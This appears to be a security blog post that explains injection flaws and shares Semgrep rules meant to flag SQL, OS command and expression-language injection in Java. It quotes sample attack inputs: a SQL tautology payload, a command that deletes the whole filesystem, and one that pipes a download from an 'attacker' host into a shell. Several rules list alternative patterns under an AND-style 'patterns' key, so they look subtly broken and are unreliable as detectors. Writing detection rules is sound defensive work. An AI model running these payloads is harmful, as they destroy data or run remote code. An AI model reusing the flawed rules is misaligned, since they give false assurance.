🛠 Semgrep Rules OWASP A03:2024 – Injection (SQL/OS/Expression)
Salute,
Today I want to share with you the rules for semgrep for injections according to OWASP A03:2024.
I think that I will periodically give examples so that they can be refined and reused.
Injections are a class of vulnerabilities where data enters the interpreter as part of a command or request with a change in meaning. A vulnerability occurs when the application does not validate input and also builds dynamic queries by concatenating strings. The vulnerability uses data directly in interpreters without parameterization or escaping. String concatenation is the joining of strings into one without changing the content.
Typical attack vectors A03
1. SQL injection: SQL fragment into a query parameter, body, cookie or header (SELECT * FROM users WHERE id = ' + id + ' , where id=' OR '1'='1 and the query returns all records and makes it possible to change them
2. OS Command Injection: input enters the OS by executing Runtime.exec, ProcessBuilder, system(), sh -c, etc. That is, we add ; rm -rf / or && curl attacker | sh , achieving remote execution of commands on the server
3. Expression / EL / OGNL injection: substitution of input into the engine and its execution. That is, the expression accesses arbitrary objects, or calls a method, reads files, executes commands, etc. Principle: The input changes the structure of the command/query, and the interpreter performs a different operation
Example of Semgrep rules according to A03:2024
- id: java-sqli-concat-critical
languages: [java]
severity: CRITICAL
message: |
OWASP A03:2024 (Injection) - possible SQL injection via concatenation
lines. Use PreparedStatement with parameters.
patterns:
- pattern: |
$STMT = $CONN.createStatement();
...
$STMT.executeQuery("SELECT " + $VAR);
- pattern: |
$STMT = $CONN.createStatement();
...
$STMT.execute("SELECT " + $VAR);
- pattern: |
$STMT = $CONN.createStatement();
...
$STMT.executeUpdate("SELECT " + $VAR);
paths:
include:
- "**/*.java"
metadata:
owasp_top_10_2024: ["A03:2024-Injection"]
cwe: ["CWE-89"]
likelihood: "HIGH"
impact: "HIGH"
- id: java-sqli-prepared-misuse-high
languages: [java]
severity: HIGH
message: |
OWASP A03:2024 (Injection) - PreparedStatement.
Use placeholders '?' and setXxx().
pattern: |
PreparedStatement $PSTMT = $CONN.prepareStatement("SELECT " + $VAR + " FROM " + $TABLE);
paths:
include:
- "**/*.java"
metadata:
owasp_top_10_2024: ["A03:2024-Injection"]
cwe: ["CWE-89"]
likelihood: "MEDIUM"
impact: "HIGH"
- id: java-os-command-injection-runtime
languages: [java]
severity: CRITICAL
message: |
OWASP A03:2024 (Injection) - possible command injection via
Runtime.getRuntime().exec()
patterns:
- pattern: |
Runtime.getRuntime().exec($CMD);
- pattern: |
Runtime.getRuntime().exec(new String[] { $A, $B, $C });
paths:
include:
- "**/*.java"
metadata:
owasp_top_10_2024: ["A03:2024-Injection"]
cwe: ["CWE-78"]
likelihood: "HIGH"
impact: "CRITICAL"
- id: java-expression-language-injection
languages: [java]
severity: HIGH
message: |
OWASP A03:2024 (Injection) - dynamic compilation/execution of expressions.
patterns:
- pattern: |
new org.springframework.expression.spel.standard.SpelExpressionParser()
.parseExpression($EXPR).getValue($CTX);
- pattern: |
$ENGINE.eval($EXPRESSION);
paths:
include:
- "**/*.java"
metadata:
owasp_top_10_2024: ["A03:2024-Injection"]
cwe: ["CWE-94"]
#toolchain #sast #appsec #course #reco #techsolution